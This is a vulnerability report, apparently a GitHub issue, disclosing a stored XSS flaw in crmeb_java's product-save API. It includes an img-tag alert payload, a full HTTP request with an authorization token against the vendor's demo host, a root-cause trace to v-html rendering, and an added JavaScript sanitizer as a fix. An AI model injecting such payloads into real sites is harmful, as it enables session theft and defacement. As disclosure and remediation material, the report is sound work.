There is a stored XSS vulnerability in the /api/admin/store/product/save interface of the crmeb_java system #12

@Mechoy

[Suggested description]
A stored XSS vulnerability exists in crmeb_java <=1.3.4.
Failure to filter or validate parameters effectively results in stored XSS.

[Vulnerability Type]
Stored XSS

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]
/api/admin/store/product/save

[Attack Type]
Remote

[Vulnerability details]
Payload:

<img src=\"1111\" alt=\"2222\" width=\"33\" height=\"33\" onclick=\"alert`333`\" onerror=alert(2)/>

Get the request message of the /api/admin/store/product/save interface.

POST /api/admin/store/product/save HTTP/2
Host: api.java.crmeb.net
Content-Length: 1213
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/plain, */*
Content-Type: application/json
Authori-Zation: 213ff6ff1ca24ae78f8263bd7ad0ea6c
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://admin.java.crmeb.net
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://admin.java.crmeb.net/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","sliderImages":["https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg"],"videoLink":"","sliderImage":"[\"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg/"]","storeName":"3333","storeInfo":"2132131","keyword":"1111","cateIds":[972,1185],"cateId":"972,1185","unitName":"1111","sort":1,"giveIntegral":1,"ficti":2,"isShow":false,"isBenefit":false,"isNew":false,"isGood":false,"isHot":true,"isBest":false,"tempId":94,"attrValue":[{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","price":0,"cost":0,"otPrice":0,"stock":0,"barCode":"","weight":0,"volume":0,"attrValue":"{\"规格\":\"默认\"}"}],"attr":[{"attrName":"规格","attrValues":"默认","id":0}],"selectRule":"","isSub":false,"content":"111","specType":false,"id":0,"couponIds":[],"coupons":[],"activity":["默认","秒杀","砍价","拼团"]}

The content parameter has a stored XSS vulnerability.
Insert the payload and send the request packet.
Find the added product and enter the product details page, click the inserted img tag to trigger the vulnerability.
There you can see it!

[Impact Code execution]
true

[Cause of vulnerability]
com.zbkj.admin.controller.StoreProductController line 77.
The save() method of storeProductService is called on line 77 of this controller.
Follow up this method to com.zbkj.service.service.impl.StoreProductServiceImpl.
On line 339, save the value of the content parameter in the request packet to the database.
Come to the front page.
In crmeb_java\admin\src\views\store\creatStore\index.vue, in line 296, use v-html to render the obtained content value. It is known that v-html will treat the obtained content as HTML code to render.
The reason for this vulnerability is that there is no legal security check on user data.

The end, thanks!
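
The root cause reported above is that the `content` value reaches `v-html` without any filtering. The following is an added example, not code from crmeb_java or from the issue author: a minimal allowlist sanitizer that rebuilds permitted tags from scratch and escapes everything else. The tag and attribute allowlist and all function names are assumptions.

```javascript
// Added example, not crmeb_java code. All names here are hypothetical.
// Allowlist: tag -> attributes that may survive sanitization.
const ALLOWED = new Map([
  ['p', []], ['br', []], ['strong', []], ['em', []],
  ['ul', []], ['ol', []], ['li', []],
  ['img', ['src', 'alt', 'width', 'height']],
]);
const VOID_TAGS = new Set(['br', 'img']);

// Neutralize markup characters; '&' is left alone so existing entities survive.
function escapeHtml(s) {
  const map = { '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[<>"']/g, (c) => map[c]);
}

// Per-attribute value checks; anything failing is dropped, not repaired.
function attrIsSafe(name, value) {
  if (name === 'src') return /^(https?:\/\/|\/)[^\s"'<>]*$/i.test(value);
  if (name === 'width' || name === 'height') return /^\d{1,4}$/.test(value);
  return true; // alt: free text, escaped on output
}

// Rebuild a tag from scratch so no raw user-supplied markup is copied through.
function rebuildTag(closing, rawName, rawAttrs) {
  const name = rawName.toLowerCase();
  if (!ALLOWED.has(name)) return ''; // unknown tag (script, iframe, ...): drop
  if (closing) return VOID_TAGS.has(name) ? '' : `</${name}>`;
  let out = `<${name}`;
  const attrRe = /([a-zA-Z][\w-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  for (const m of rawAttrs.matchAll(attrRe)) {
    const attr = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? '';
    if (ALLOWED.get(name).includes(attr) && attrIsSafe(attr, value)) {
      out += ` ${attr}="${escapeHtml(value)}"`;
    }
  }
  return `${out}>`;
}

// Sanitize the product `content` value before it is stored or passed to v-html.
function sanitizeContent(html) {
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
  let out = '';
  let last = 0;
  for (const m of html.matchAll(tagRe)) {
    out += escapeHtml(html.slice(last, m.index)); // text between tags
    out += rebuildTag(m[1] === '/', m[2], m[3]);
    last = m.index + m[0].length;
  }
  return out + escapeHtml(html.slice(last));
}
```

Run on the payload from this report, the `onclick` and `onerror` handlers are removed, and the relative `src="1111"` is also dropped because this allowlist only accepts `http(s)://` or path-absolute image URLs. A maintained sanitizer library applied on both the server and the Vue side is preferable to hand-rolled parsing in production.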
